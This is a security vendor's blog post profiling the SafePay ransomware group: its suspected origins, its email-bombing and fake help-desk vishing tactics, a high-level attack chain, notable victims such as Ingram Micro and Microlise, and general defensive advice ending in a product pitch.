SafePay: Email bombs, phone scams and really big ransoms

When it comes to choosing a brand name, “SafePay” must be among the most boring of choices. It sounds more like a payment app than an organized crime group. There are no dragons or bugs or heads full of snakes, but the group behind the brand is skilled and ruthless. SafePay has been making a name for itself with strong encryption, data exfiltration and big ransom demands from a fast-growing list of victims.  

SafePay ransomware was first observed in October 2024, and later confirmed to have been active at least one month earlier. By the end of the first quarter of 2025, SafePay claimed over 200 victims, including managed service providers (MSPs) and small-to-midsize businesses (SMBs) across multiple sectors. The group has been relentless, claiming between 58-70 victims in May 2025, making it the most active ransomware group that month.  

Who is SafePay?

Let’s start with the brand. The name “SafePay” may be an attempt to make the group look trustworthy, or create confusion by using the name of legitimate security products. By using the same name as legitimate and potentially trusted software, the group can obscure their activities in process lists, social engineering campaigns or phishing emails. There’s no publicly available evidence of any significance or meaning behind the name, so perhaps there's no meaning at all. 

The SafePay ransomware operators refer to themselves as the "SafePay team." The group does not offer a ransomware-as-a-service (RaaS) program, which suggests SafePay is a centralized operation that manages its own infrastructure, operations and negotiations.

Experts speculate SafePay is managed by experienced threat actors who have rebranded or migrated from another ransomware group. There are significant similarities between the SafePay and LockBit ransomware binaries, though SafePay is most similar to LockBit 3.0 which was leaked in 2022. Analysis by Yelisey Boguslavskiy found similarities between SafePay and Conti attacks, suggesting that SafePay may include former members of Conti and other groups. Boguslavskiy also speculates that the growth of SafePay in 2024 may have been a primary reason for the collapse of Black Basta. This suggests SafePay was formed through an intentional and strategic acquisition of talent from established threat groups.

There is no publicly confirmed location of the SafePay operators, but there is some evidence pointing to an Eastern European ‘home base.’ The SafePay binary includes a kill switch to prevent it from running on systems using Russian or other Cyrillic languages as the default. This kill switch is one of the most common indicators that the group is operating in that region.

Since SafePay is not a RaaS operation, we do not have recruitment posts or affiliate rules that might hint at its location. Victim location data shows us that SafePay appears to prefer targeting victims in the US and Germany. Here’s the breakdown by country:

SafePay and social engineering

SafePay attacks rely heavily on social engineering tactics. One of the group’s signature moves is to disrupt a company’s workforce by sending a large volume of spam emails to the employees. Researchers observed one attack deliver over 3,000 of these spam messages within 45 minutes.

The attackers then take advantage of the chaos caused by the spam attack by using Microsoft Teams to contact the employees through an audio or video call or a text message. The threat actor impersonates a member of the company’s tech support and offers to resolve the problems caused by the email attack. If the threat actor / caller is successful, he will convince the employee to provide remote access to the system through something like Microsoft Quick Assist. The Microsoft Security blog has a step-by-step walkthrough of how Black Basta used this method to gain initial access. If you aren’t familiar with how these attacks work, consider reviewing that blog post and this Microsoft article on securing Microsoft Teams.

Let’s note a few things here. First and most importantly, this is an example of threat actors turning the company help desk into an attack vector. In this attack, the help desk is being impersonated, and the threat actor is depending on the employee not knowing the difference between a threat actor and legitimate tech support. Chaos ransomware is currently using a variation of this attack, and we’ve seen this in the past with Black Basta and others. You can combat this type of attack through employee training and security policies that require verification for help desk support. See this RSA blog for more on help desk security.

Another significant point here is that voice phishing (vishing) attacks are often carried out by threat actors that specialize in phone fraud. These ‘callers’ or ‘talkers’ advertise their services on crime forums or marketplaces. Organized caller groups may offer vishing-as-a-service and specialized scams like getting victims to approve MFA prompts. You may also find recruitment posts like this one: 

Callers are usually fluent in English and other languages, and they have strong verbal and conversational skills. The role of a caller is to call a target, impersonate a trusted figure, and manipulate the victim into participating in the scam. This is a special type of con that some ransomware groups want to hand off to someone else. Whether a group uses internal or third-party callers, you cannot assume that a vishing scammer will have a noticeable accent or an AI voice.

You can see examples of attempted vishing scams and aggressive callers in ‘scambaiting’ videos on YouTube. Fair warning: Some scambaiters remove offensive language and phrases, but you may want to assume all scambaiting content is inappropriate for work and kids.

SafePay attack chain

Aside from social engineering, SafePay has been observed using stolen credentials, weak/default passwords, exploits and security misconfiguration to gain access to systems. They may establish access on their own or purchase access from an initial access broker (IAB). After initial access is established, the attack proceeds through the typical steps.

Privilege escalation: Once inside the network, attackers escalate privileges to gain deeper control. Techniques involve exploiting operating system vulnerabilities and weak security, and stealing credentials using tools like Mimikatz. This allows the attack to transition from basic user access to administrator or system-level rights. If successful, the attackers may gain unfettered access in the subsequent phases of the attack.

Lateral movement: Attackers move through the network to discover sensitive data and additional resources. By this point, they are using several "living-off-the-land" techniques to map the network and carry out other steps in the attack.

Defense evasion: The attack will attempt to disable antivirus, clear event logs, obfuscate malicious code, and alter system registries to turn off security alerts. SafePay also attempts to establish persistence, usually through modifying startup items or configuring remote access software. Persistence is used to resume an interrupted attack and establish long-term access to the system if needed.  

Data collection & exfiltration: Data is identified, collected, and compressed for exfiltration. SafePay has been observed using WinRAR and 7-Zip for compression, and RClone and FileZilla FTP for data transfer.

Encryption & extortion: Once critical data has been exfiltrated, the ransomware payload encrypts the files and renames each with a .safepay file extension.  SafePay drops a ransom note (readme_safepay.txt) with payment instructions and threats of data exposure on leak sites. 

Motivation & notable victims

SafePay is a financially driven ransomware operation, which is demonstrated by the consistent use of double extortion (encryption + data leaks) and this text from the ransom note:

We are not a politically motivated group and want nothing more than money.

Ransom demands from SafePay are substantial, typically calculated as 1-3% of the victim's annual revenue. A ransom demand may be reduced significantly if the victim faces regulatory repercussions for paying a ransom.

One of SafePay’s most high-profile victims is Ingram Micro, a global IT distribution and services company. The attack was confirmed in early July 2025, though Ingram Micro did not name the attacker. Researchers linked the incident to SafePay based on evidence posted on the group's leak site and threat intelligence shared by Dark Web monitoring services. The attack disrupted core operations globally, and industry analysts estimated losses of at least $136 million in sales each day that it could not fulfill orders.

SafePay attacked Microlise in October 2024. Microlise is a UK-based company that provides transport management technology solutions like fleet tracking, driver communications, vehicle health & safety, and so on. This disrupted Microlise customers’ operations, including DHL deliveries and security systems in the prisoner vans used by the UK Ministry of Justice.  

Protect yourself

Defending against SafePay ransomware requires a complete cybersecurity strategy. This includes technical controls such as multi-factor authentication, regular patching, strong endpoint detection and response, and network segmentation. It’s becoming increasingly important to train employees on vishing and other social engineering attacks. And of course, all companies should have a complete anti-ransomware backup solution in place, and teams should regularly test the recovery process.

Barracuda can help

Don’t wait to get protected. The best time to fight ransomware is before it strikes. Safeguard your business with ransomware protection solutions that block phishing emails, protect your web applications and secure your business-critical data. With guidance from cybersecurity experts, you can build a ransomware protection plan for your business.